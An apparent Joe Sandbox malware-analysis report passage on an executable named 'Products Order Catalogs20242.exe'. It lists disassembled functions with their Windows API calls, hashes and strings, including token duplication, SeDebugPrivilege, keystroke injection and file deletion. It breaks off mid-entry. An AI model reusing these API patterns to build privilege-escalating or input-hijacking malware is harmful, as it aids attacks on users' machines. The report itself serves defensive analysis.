                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProcWindow
                                                                                                • String ID:
                                                                                                • API String ID: 181713994-0
                                                                                                • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                                • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wfsopen
                                                                                                • String ID:
                                                                                                • API String ID: 197181222-0
                                                                                                • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                                • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                                APIs
                                                                                                • CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2962429428-0
                                                                                                • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                                • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(000001F4), ref: 040D02B9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1762622283.00000000040CE000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CE000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_40ce000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                • Instruction ID: b965de8d104bff09bfbd795454b09747a9c4820967a67d473929807df7475341
                                                                                                • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                • Instruction Fuzzy Hash: 54E0BF7494120DEFDB00DFA4D5496ED7BB4EF04301F1005A1FD05E7680DB309E548A62
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(000001F4), ref: 040D02B9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1762622283.00000000040CE000.00000040.00000020.00020000.00000000.sdmp, Offset: 040CE000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_40ce000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                • Instruction ID: 0a8139292e4e7c888c58acf60b4e94f75a811372f37e0c61cbc850fa5dd2fee3
                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                • Instruction Fuzzy Hash: 7EE0E67494120DDFDB00DFB4D5496AD7BB4EF04301F100561FD05E2280D6309D508A72
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PF$PF$"DF$$JG$&F$&F$'HG$'|G$*"D$*nF$*vG$+%F$0wE$4rE$5CG$6MG$6NF$6tE$7eF$<HF$<G$ApG$BnE$DvE$F)G$GSG$IqE$K@G$LbF$MdF$MuE$NgF$O*F$PIF$QbG$R+F$RnG$YlE$YtG$Z9G$ZPG$^[F$^oE$_7G$_?G$b"D$fH$i}G$j)F$kQG$lE$rTG$vjE$}eE$~mE$*F$.F$3G$_G$`F$mE$pE$wG
                                                                                                • API String ID: 0-4260964411
                                                                                                • Opcode ID: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                • Instruction ID: b1e67458769bbea4a86cd8903524db5b6e79558e2e7ab8c51025fc7bd56032a7
                                                                                                • Opcode Fuzzy Hash: bb854585b2a8d25cf70b859c951904b6599901827447d171664d6ae6ba41e592
                                                                                                • Instruction Fuzzy Hash: 118366F1905B409FC351DFAAF984605BAE1F3AA3157A2857FC5088B731D7B8194A8F4C
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                • SendMessageW.USER32 ref: 0047C2FB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$State$LongProcWindow
                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                • API String ID: 1562745308-4164748364
                                                                                                • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                                • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                                • IsIconic.USER32(?), ref: 004375E1
                                                                                                • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                                • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                                • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 0043768B
                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                • String ID: Shell_TrayWnd
                                                                                                • API String ID: 3778422247-2988720461
                                                                                                • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                                • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0044621B
                                                                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                                • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                                • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                                • _wcslen.LIBCMT ref: 0044639E
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                • _wcsncpy.LIBCMT ref: 004463C7
                                                                                                • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                                • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                                • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                                • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                                • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                                • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                                • String ID: $default$winsta0
                                                                                                • API String ID: 2173856841-1027155976
                                                                                                • Opcode ID: dd3fbc5dfca59238d4d8e810ac2ec3cbfbbbad9087bbfadb14fa7de528d26857
                                                                                                • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                                                • Opcode Fuzzy Hash: dd3fbc5dfca59238d4d8e810ac2ec3cbfbbbad9087bbfadb14fa7de528d26857
                                                                                                • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                                                APIs
                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Products Order Catalogs20242.exe,?,C:\Users\user\Desktop\Products Order Catalogs20242.exe,004A8E80,C:\Users\user\Desktop\Products Order Catalogs20242.exe,0040F3D2), ref: 0040FFCA
                                                                                                  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A45
                                                                                                  • Part of subcall function 00436A1D: __wsplitpath.LIBCMT ref: 00436A6C
                                                                                                  • Part of subcall function 00436A1D: __wcsicoll.LIBCMT ref: 00436A93
                                                                                                  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                • _wcscat.LIBCMT ref: 0044BD96
                                                                                                • _wcscat.LIBCMT ref: 0044BDBF
                                                                                                • __wsplitpath.LIBCMT ref: 0044BDEC
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0044BE04
                                                                                                • _wcscpy.LIBCMT ref: 0044BE73
                                                                                                • _wcscat.LIBCMT ref: 0044BE85
                                                                                                • _wcscat.LIBCMT ref: 0044BE97
                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC3
                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BED5
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BEF5
                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0C
                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044BF17
                                                                                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2E
                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF35
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BF51
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF66
                                                                                                • FindClose.KERNEL32(00000000), ref: 0044BF7E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                                                • String ID: \*.*
                                                                                                • API String ID: 2188072990-1173974218
                                                                                                • Opcode ID: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                • Instruction ID: 14f7055b3521afb04026f42b490306401b0ba37f80ed0ea0ca267746d8cc4687
                                                                                                • Opcode Fuzzy Hash: 37b83e77465c63a9a0fc5a2f65b261a2e9867c78515d1bc57cb11e6e3b171851
                                                                                                • Instruction Fuzzy Hash: CA5166B2008344AAD720DBA4DC44FDF73E8AB85314F448D1EF68982141EB79D64CCBAA
                                                                                                APIs
                                                                                                • __invoke_watson.LIBCMT ref: 004203A4
                                                                                                  • Part of subcall function 00417D93: _memset.LIBCMT ref: 00417DBB
                                                                                                  • Part of subcall function 00417D93: IsDebuggerPresent.KERNEL32(?,?,00000314), ref: 00417E6F
                                                                                                  • Part of subcall function 00417D93: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000314), ref: 00417E79
                                                                                                  • Part of subcall function 00417D93: UnhandledExceptionFilter.KERNEL32(?,?,?,00000314), ref: 00417E86
                                                                                                  • Part of subcall function 00417D93: GetCurrentProcess.KERNEL32(C0000417,?,?,00000314), ref: 00417EA1
                                                                                                  • Part of subcall function 00417D93: TerminateProcess.KERNEL32(00000000,?,?,00000314), ref: 00417EA8
                                                                                                • __get_daylight.LIBCMT ref: 004203B0
                                                                                                • __invoke_watson.LIBCMT ref: 004203BF
                                                                                                • __get_daylight.LIBCMT ref: 004203CB
                                                                                                • __invoke_watson.LIBCMT ref: 004203DA
                                                                                                • ____lc_codepage_func.LIBCMT ref: 004203E2
                                                                                                • _strlen.LIBCMT ref: 00420442
                                                                                                • __malloc_crt.LIBCMT ref: 00420449
                                                                                                • _strlen.LIBCMT ref: 0042045F
                                                                                                • _strcpy_s.LIBCMT ref: 0042046D
                                                                                                • __invoke_watson.LIBCMT ref: 00420482
                                                                                                • GetTimeZoneInformation.KERNEL32(00496C28), ref: 004204AA
                                                                                                • WideCharToMultiByte.KERNEL32(?,?,00496C2C,?,?,0000003F,?,?), ref: 00420528
                                                                                                • WideCharToMultiByte.KERNEL32(?,?,00496C80,000000FF,?,0000003F,?,?,?,00496C2C,?,?,0000003F,?,?), ref: 0042055C
                                                                                                  • Part of subcall function 00413A88: __lock.LIBCMT ref: 00413AA6
                                                                                                  • Part of subcall function 00413A88: ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                                                  • Part of subcall function 00413A88: ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                                                  • Part of subcall function 00413A88: RtlFreeHeap.NTDLL(00000000,00411739,0048C758,0000000C,004183E8,00000000,0048CA38,0000000C,00418422,00411739,?,?,004224D3,00000004,0048CCA0,0000000C), ref: 00413AF0
                                                                                                  • Part of subcall function 00413A88: GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                                                • __invoke_watson.LIBCMT ref: 004205CC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: __invoke_watson$ByteCharExceptionFilterMultiProcessUnhandledWide__get_daylight_strlen$CurrentDebuggerErrorFreeHeapInformationLastPresentTerminateTimeZone____lc_codepage_func___sbh_find_block___sbh_free_block__lock__malloc_crt_memset_strcpy_s
                                                                                                • String ID: S\
                                                                                                • API String ID: 4084823496-393906132
                                                                                                • Opcode ID: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                                • Instruction ID: b357f19af7064e56bcdb8625987f67de7edc2332d57e558cb2e7b84f91b73af7
                                                                                                • Opcode Fuzzy Hash: dc5610741a0148f7786b6b9dfa96f50a6ae589fbdbcd52e429fe3139d0279a48
                                                                                                • Instruction Fuzzy Hash: 6A91D371E00125AFDB20EF65EC819AE7BE9EF55300B95003BF540A7253DA3C89828F5C
                                                                                                APIs
                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00434D75
                                                                                                • __swprintf.LIBCMT ref: 00434D91
                                                                                                • _wcslen.LIBCMT ref: 00434D9B
                                                                                                • _wcslen.LIBCMT ref: 00434DB0
                                                                                                • _wcslen.LIBCMT ref: 00434DC5
                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00434DD7
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00434E0A
                                                                                                • _memset.LIBCMT ref: 00434E27
                                                                                                • _wcslen.LIBCMT ref: 00434E3C
                                                                                                • _wcsncpy.LIBCMT ref: 00434E6F
                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00434EA9
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00434EB4
                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00434EBB
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00434ECE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                • String ID: :$\$\??\%s
                                                                                                • API String ID: 302090198-3457252023
                                                                                                • Opcode ID: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                • Instruction ID: 730b2dca1b6b09bd6b76555d3316dee95f4818bcffb97f26f8f03165767cfd2f
                                                                                                • Opcode Fuzzy Hash: 1623bec2b974bb3ee5261838648fb58b2a9d6db5aa255760d49714c370e47f4e
                                                                                                • Instruction Fuzzy Hash: 30416676604340ABE330EB64DC49FEF73E8AFD8714F00891EF649921D1E7B4A645876A
                                                                                                APIs
                                                                                                  • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                                • GetLastError.KERNEL32 ref: 004644B4
                                                                                                • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                                • String ID: SeDebugPrivilege
                                                                                                • API String ID: 1312810259-2896544425
                                                                                                • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
